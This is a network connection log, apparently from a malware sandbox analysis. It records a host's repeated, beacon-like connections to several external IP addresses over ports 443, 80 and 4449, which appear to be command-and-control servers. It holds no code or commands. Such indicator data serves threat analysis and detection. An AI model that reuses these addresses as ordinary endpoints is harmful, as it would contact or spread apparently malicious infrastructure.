Jul 27, 2024 08:55:54.520371914 CEST	50797	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:54.535990000 CEST	50797	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:54.536046028 CEST	443	50797	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:54.536077023 CEST	50797	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:54.536092997 CEST	443	50797	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:54.653629065 CEST	50798	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:54.653711081 CEST	443	50798	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:54.654035091 CEST	50798	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:54.654383898 CEST	50798	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:54.654442072 CEST	443	50798	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:55.387502909 CEST	4449	50787	193.222.96.24	192.168.2.4
Jul 27, 2024 08:55:55.387718916 CEST	50787	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 08:55:55.610603094 CEST	443	50798	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:55.610846043 CEST	50798	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:55.613864899 CEST	50798	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:55.613918066 CEST	443	50798	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:55.614007950 CEST	50798	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:55.614021063 CEST	443	50798	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:55.614326954 CEST	443	50798	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:55.614623070 CEST	50798	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:55.656533003 CEST	443	50798	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:56.845896959 CEST	443	50798	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:56.845974922 CEST	443	50798	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:56.846169949 CEST	50798	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:56.860551119 CEST	50798	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:56.860551119 CEST	50798	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:56.860615015 CEST	443	50798	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:56.860651970 CEST	443	50798	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:56.981590986 CEST	50799	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:56.981673956 CEST	443	50799	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:56.981790066 CEST	50799	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:56.988173962 CEST	50799	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:56.988250017 CEST	443	50799	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:57.653237104 CEST	443	50799	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:57.653395891 CEST	50799	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:57.655862093 CEST	50799	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:57.655913115 CEST	443	50799	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:57.656001091 CEST	50799	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:57.656013966 CEST	443	50799	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:57.656445026 CEST	443	50799	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:57.656584978 CEST	50799	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:57.700582981 CEST	443	50799	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:58.404556990 CEST	50787	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 08:55:58.404855013 CEST	50800	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 08:55:58.410221100 CEST	4449	50787	193.222.96.24	192.168.2.4
Jul 27, 2024 08:55:58.410274982 CEST	4449	50800	193.222.96.24	192.168.2.4
Jul 27, 2024 08:55:58.410358906 CEST	50800	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 08:55:58.410670996 CEST	50800	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 08:55:58.416873932 CEST	4449	50800	193.222.96.24	192.168.2.4
Jul 27, 2024 08:55:58.660273075 CEST	443	50799	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:58.660448074 CEST	443	50799	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:58.660518885 CEST	50799	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:58.674345970 CEST	50799	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:58.674346924 CEST	50799	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:58.674412012 CEST	443	50799	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:58.674453020 CEST	443	50799	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:58.786752939 CEST	50801	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:58.786835909 CEST	443	50801	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:58.786922932 CEST	50801	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:58.787341118 CEST	50801	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:58.787375927 CEST	443	50801	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:59.675715923 CEST	443	50801	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:59.675955057 CEST	50801	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:59.678019047 CEST	50801	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:59.678049088 CEST	443	50801	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:59.678121090 CEST	50801	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:59.678133011 CEST	443	50801	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:59.679105043 CEST	443	50801	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:59.679477930 CEST	50801	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:59.724515915 CEST	443	50801	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:01.030373096 CEST	443	50801	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:01.030534029 CEST	443	50801	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:01.030774117 CEST	50801	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:01.044572115 CEST	50801	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:01.044572115 CEST	50801	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:01.044635057 CEST	443	50801	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:01.044668913 CEST	443	50801	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:01.146143913 CEST	50802	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:01.146183014 CEST	443	50802	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:01.146253109 CEST	50802	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:01.146620989 CEST	50802	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:01.146636009 CEST	443	50802	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:01.793236017 CEST	443	50802	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:01.793349981 CEST	50802	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:01.795511007 CEST	50802	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:01.795526981 CEST	443	50802	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:01.795572996 CEST	50802	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:01.795578003 CEST	443	50802	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:01.795613050 CEST	50802	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:01.795617104 CEST	443	50802	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:01.796629906 CEST	443	50802	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:01.796773911 CEST	50802	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:01.796782970 CEST	443	50802	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:03.067164898 CEST	443	50802	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:03.067347050 CEST	443	50802	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:03.067429066 CEST	50802	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:03.082777977 CEST	50802	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:03.082803011 CEST	443	50802	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:03.082817078 CEST	50802	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:03.082823992 CEST	443	50802	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:03.193003893 CEST	50803	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:03.193088055 CEST	443	50803	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:03.193243980 CEST	50803	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:03.193646908 CEST	50803	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:03.193705082 CEST	443	50803	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:03.868155956 CEST	443	50803	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:03.868405104 CEST	50803	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:03.895169973 CEST	50803	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:03.895246983 CEST	443	50803	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:03.895536900 CEST	50803	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:03.895586967 CEST	443	50803	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:03.896240950 CEST	443	50803	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:03.896522045 CEST	50803	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:03.940597057 CEST	443	50803	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:04.366225958 CEST	50804	80	192.168.2.4	190.12.87.61
Jul 27, 2024 08:56:04.371810913 CEST	80	50804	190.12.87.61	192.168.2.4
Jul 27, 2024 08:56:04.372081995 CEST	50804	80	192.168.2.4	190.12.87.61
Jul 27, 2024 08:56:04.372081995 CEST	50804	80	192.168.2.4	190.12.87.61
Jul 27, 2024 08:56:04.372081995 CEST	50804	80	192.168.2.4	190.12.87.61
Jul 27, 2024 08:56:04.380348921 CEST	80	50804	190.12.87.61	192.168.2.4
Jul 27, 2024 08:56:04.380390882 CEST	80	50804	190.12.87.61	192.168.2.4
Jul 27, 2024 08:56:04.917901993 CEST	443	50803	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:04.918040037 CEST	443	50803	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:04.918270111 CEST	50803	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:04.932522058 CEST	50803	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:04.932522058 CEST	50803	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:04.932585955 CEST	443	50803	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:04.932624102 CEST	443	50803	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:05.036863089 CEST	50805	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:05.036897898 CEST	443	50805	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:05.036959887 CEST	50805	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:05.037276030 CEST	50805	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:05.037285089 CEST	443	50805	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:05.654454947 CEST	443	50805	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:05.654620886 CEST	50805	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:05.656951904 CEST	50805	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:05.656965971 CEST	443	50805	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:05.657016039 CEST	50805	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:05.657021999 CEST	443	50805	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:05.657068968 CEST	50805	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:05.657073021 CEST	443	50805	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:05.657977104 CEST	443	50805	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:05.658183098 CEST	50805	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:05.700521946 CEST	443	50805	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:06.962800980 CEST	443	50805	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:06.962883949 CEST	443	50805	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:06.962991953 CEST	50805	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:06.977185011 CEST	50805	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:06.977185011 CEST	50805	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:06.977206945 CEST	443	50805	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:06.977215052 CEST	443	50805	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:07.083595991 CEST	50806	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:07.083677053 CEST	443	50806	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:07.083777905 CEST	50806	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:07.084104061 CEST	50806	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:07.084131956 CEST	443	50806	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:07.672147989 CEST	443	50806	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:07.672377110 CEST	50806	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:07.674607992 CEST	50806	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:07.674659967 CEST	443	50806	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:07.674729109 CEST	50806	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:07.674742937 CEST	443	50806	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:07.675163031 CEST	443	50806	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:07.675467968 CEST	50806	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:07.716572046 CEST	443	50806	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:09.040611982 CEST	443	50806	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:09.040779114 CEST	443	50806	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:09.040958881 CEST	50806	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:09.054585934 CEST	50806	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:09.054586887 CEST	50806	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:09.054650068 CEST	443	50806	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:09.054733992 CEST	443	50806	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:09.161763906 CEST	50807	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:09.161818981 CEST	443	50807	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:09.161920071 CEST	50807	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:09.162399054 CEST	50807	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:09.162420988 CEST	443	50807	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:09.840939045 CEST	443	50807	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:09.841094971 CEST	50807	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:09.843750954 CEST	50807	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:09.843766928 CEST	443	50807	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:09.843861103 CEST	50807	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:09.843868971 CEST	443	50807	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:09.844274044 CEST	443	50807	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:09.844414949 CEST	50807	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:09.888539076 CEST	443	50807	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:10.832318068 CEST	443	50807	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:10.832477093 CEST	443	50807	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:10.832689047 CEST	50807	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:10.851700068 CEST	50807	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:10.851700068 CEST	50807	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:10.851773024 CEST	443	50807	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:10.851810932 CEST	443	50807	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:10.958560944 CEST	50808	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:10.958604097 CEST	443	50808	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:10.958796024 CEST	50808	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:10.959064960 CEST	50808	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:10.959083080 CEST	443	50808	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:11.551803112 CEST	443	50808	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:11.552006006 CEST	50808	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:11.554754019 CEST	50808	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:11.554805994 CEST	443	50808	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:11.554896116 CEST	50808	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:11.554910898 CEST	443	50808	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:11.555334091 CEST	443	50808	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:11.555603027 CEST	50808	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:11.596576929 CEST	443	50808	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:12.917768955 CEST	443	50808	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:12.917918921 CEST	443	50808	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:12.918118954 CEST	50808	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:12.932328939 CEST	50808	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:12.932328939 CEST	50808	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:12.932389975 CEST	443	50808	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:12.932426929 CEST	443	50808	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:13.041138887 CEST	50809	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:13.041218042 CEST	443	50809	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:13.041569948 CEST	50809	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:13.047436953 CEST	50809	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:13.047508955 CEST	443	50809	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:13.682903051 CEST	443	50809	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:13.683118105 CEST	50809	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:13.685297966 CEST	50809	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:13.685349941 CEST	443	50809	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:13.685427904 CEST	50809	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:13.685441017 CEST	443	50809	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:13.686284065 CEST	443	50809	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:13.686422110 CEST	50809	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:13.728574038 CEST	443	50809	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:15.028219938 CEST	443	50809	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:15.028374910 CEST	443	50809	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:15.028537035 CEST	50809	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:15.042306900 CEST	50809	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:15.042306900 CEST	50809	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:15.042370081 CEST	443	50809	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:15.042414904 CEST	443	50809	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:15.146096945 CEST	50810	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:15.146178007 CEST	443	50810	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:15.146281004 CEST	50810	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:15.146749020 CEST	50810	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:15.146826029 CEST	443	50810	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:15.835586071 CEST	443	50810	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:15.835841894 CEST	50810	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:15.838104010 CEST	50810	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:15.838155985 CEST	443	50810	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:15.838227034 CEST	50810	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:15.838241100 CEST	443	50810	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:15.839183092 CEST	443	50810	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:15.839447021 CEST	50810	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:15.880549908 CEST	443	50810	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:16.842180014 CEST	443	50810	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:16.842323065 CEST	443	50810	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:16.842547894 CEST	50810	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:16.857939005 CEST	50810	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:16.857939005 CEST	50810	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:16.858002901 CEST	443	50810	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:16.858040094 CEST	443	50810	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:16.958656073 CEST	50811	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:16.958738089 CEST	443	50811	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:16.959041119 CEST	50811	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:16.959450960 CEST	50811	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:16.959506989 CEST	443	50811	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:17.569262028 CEST	443	50811	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:17.569500923 CEST	50811	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:17.571650028 CEST	50811	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:17.571702003 CEST	443	50811	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:17.571772099 CEST	50811	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:17.571785927 CEST	443	50811	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:17.572213888 CEST	443	50811	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:17.572516918 CEST	50811	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:17.572597980 CEST	443	50811	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:18.788321972 CEST	443	50811	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:18.788470030 CEST	443	50811	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:18.788710117 CEST	50811	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:18.803955078 CEST	50811	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:18.803956032 CEST	50811	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:18.804018974 CEST	443	50811	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:18.804054976 CEST	443	50811	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:18.911819935 CEST	50812	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:18.911860943 CEST	443	50812	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:18.912077904 CEST	50812	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:18.912477970 CEST	50812	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:18.912525892 CEST	443	50812	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:19.511249065 CEST	443	50812	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:19.511451006 CEST	50812	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:19.513628006 CEST	50812	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:19.513679981 CEST	443	50812	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:19.513745070 CEST	50812	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:19.513757944 CEST	443	50812	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:19.514081955 CEST	443	50812	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:19.514322042 CEST	50812	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:19.556540012 CEST	443	50812	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:19.915184975 CEST	4449	50800	193.222.96.24	192.168.2.4
Jul 27, 2024 08:56:19.915338993 CEST	50800	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 08:56:20.869901896 CEST	443	50812	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:20.869982958 CEST	443	50812	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:20.870191097 CEST	50812	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:20.885088921 CEST	50812	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:20.885088921 CEST	50812	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:20.885153055 CEST	443	50812	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:20.885238886 CEST	443	50812	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:20.989712000 CEST	50813	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:20.989795923 CEST	443	50813	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:20.989945889 CEST	50813	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:20.990267038 CEST	50813	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:20.990303040 CEST	443	50813	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:21.666977882 CEST	443	50813	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:21.667227983 CEST	50813	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:21.669336081 CEST	50813	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:21.669363022 CEST	443	50813	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:21.669437885 CEST	50813	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:21.669452906 CEST	443	50813	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:21.669702053 CEST	443	50813	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:21.669841051 CEST	50813	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:21.712542057 CEST	443	50813	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:22.703788042 CEST	443	50813	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:22.704015970 CEST	443	50813	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:22.704092026 CEST	50813	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:22.718065977 CEST	50813	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:22.718111992 CEST	443	50813	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:22.718144894 CEST	50813	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:22.718159914 CEST	443	50813	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:22.833620071 CEST	50814	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:22.833664894 CEST	443	50814	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:22.833750010 CEST	50814	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:22.834151030 CEST	50814	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:22.834167004 CEST	443	50814	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:22.943726063 CEST	50800	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 08:56:22.943996906 CEST	50815	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:56:22.949691057 CEST	4449	50800	193.222.96.24	192.168.2.4
Jul 27, 2024 08:56:22.949819088 CEST	4449	50815	94.156.79.190	192.168.2.4
Jul 27, 2024 08:56:22.949884892 CEST	50815	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:56:22.950190067 CEST	50815	4449	192.168.2.4	94.156.79.190
